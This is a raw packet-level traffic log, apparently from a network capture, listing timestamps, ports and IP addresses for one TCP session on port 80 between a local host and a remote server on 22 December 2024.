Dec 22, 2024 02:16:12.354043007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.354079008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.425968885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.426047087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.426065922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.426120043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.428308010 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.428378105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.428394079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.428447008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.432914972 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.432974100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.432981968 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.433036089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.437614918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.437680960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.438046932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.438105106 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.442279100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.442336082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.442514896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.442574978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.446968079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.447030067 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.447179079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.447235107 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.451651096 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.451706886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.451714993 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.451762915 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.456293106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.456389904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.456397057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.456449986 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.460978985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.461036921 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.461102962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.461160898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.465647936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.465712070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.465744019 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.465807915 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.470312119 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.470383883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.470457077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.470519066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.474965096 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.475024939 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.475117922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.475174904 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.479650021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.479751110 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.479860067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.479916096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.484357119 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.484416962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.484452009 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.484515905 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.488019943 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.488073111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.488075018 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.488132000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.491691113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.491728067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.491751909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.491801023 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.495359898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.495415926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.495434046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.495464087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.498931885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.499008894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.499051094 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.499125957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.502620935 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.502684116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.502734900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.502791882 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.506252050 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.506305933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.506372929 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.506426096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.509902000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.509959936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.510031939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.510088921 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.513555050 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.513657093 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.618257999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.618356943 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.618443966 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.618484974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.619474888 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.619535923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.619544029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.619594097 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.622672081 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.622726917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.622739077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.622780085 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.625336885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.625396967 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.625485897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.625540018 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.628112078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.628168106 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.628189087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.628242016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.630923986 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.630985022 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.631074905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.631154060 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.633677006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.633737087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.633810997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.633865118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.636332989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.636384964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.636459112 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.636512041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.638946056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.639008999 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.639143944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.639209032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.641562939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.641623974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.641689062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.641803026 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.644176006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.644247055 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.644308090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.644362926 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.646775007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.646827936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.646889925 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.646941900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.649389029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.649450064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.649502039 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.649554968 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.651983976 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.652105093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.652112007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.652158976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.654591084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.654647112 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.654720068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.654772997 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.657181978 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.657241106 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.657298088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.657351971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.659790039 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.659858942 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.659903049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.659955978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.662381887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.662451982 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.662519932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.662585974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.664974928 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.665033102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.665107965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.665162086 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.667603970 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.667659998 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.667705059 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.667772055 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.670197964 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.670254946 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.670329094 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.670388937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.672782898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.672841072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.672946930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.673002005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.675403118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.675472021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.675529003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.675582886 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.678003073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.678073883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.678169012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.678245068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.680636883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.680710077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.680799961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.680856943 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.683222055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.683347940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.683363914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.683417082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.685831070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.685894966 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.685960054 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.686007023 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.688447952 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.688513041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.688541889 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.688590050 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.691046000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.691107988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.691159964 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.691210985 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.693655968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.693743944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.693763971 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.693819046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.696245909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.696316004 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.696371078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.696424961 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.698865891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.698930979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.699007034 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.699057102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.701492071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.701558113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.701598883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.701666117 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.704063892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.704165936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.704294920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.704356909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.706651926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.706710100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.706804037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.706861973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.810067892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.810148001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.810266972 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.810326099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.811111927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.811170101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.811249971 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.811306000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.813330889 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.813388109 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.813441038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.813504934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.815381050 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.815437078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.815495968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.815552950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.817555904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.817670107 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.817675114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.817734003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.819699049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.819756031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.819816113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.819884062 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.821806908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.821871996 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.821928978 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.821985006 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.823929071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.823986053 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.824029922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.824084044 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.825905085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.825962067 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.826016903 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.826083899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.827923059 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.827986956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.828038931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.828100920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.829922915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.830001116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.830046892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.830108881 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.831918001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.831971884 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.832027912 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.832082987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.833889961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.833941936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.833970070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.834032059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.835783958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.835841894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.835931063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.835988045 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.837775946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.837877989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.837888956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.837946892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.839660883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.839720011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.839776993 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.839833021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.841645002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.841703892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.841753960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.841811895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.843525887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.843580008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.843647957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.843703032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.845469952 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.845539093 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.845593929 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.845669985 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.847446918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.847501993 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.847590923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.847646952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.849349022 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.849442005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.849447966 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.849513054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.851339102 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.851397038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.851499081 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.851553917 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.853245974 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.853302002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.853360891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.853415012 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.855170965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.855226040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.855281115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.855331898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.857098103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.857160091 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.857196093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.857261896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.859054089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.859112024 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.859185934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.859261036 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.860991001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.861088991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.861095905 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.861139059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.862916946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.862974882 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.863037109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.863101959 CET	49765	80	192.168.2.4	31.41.244.11
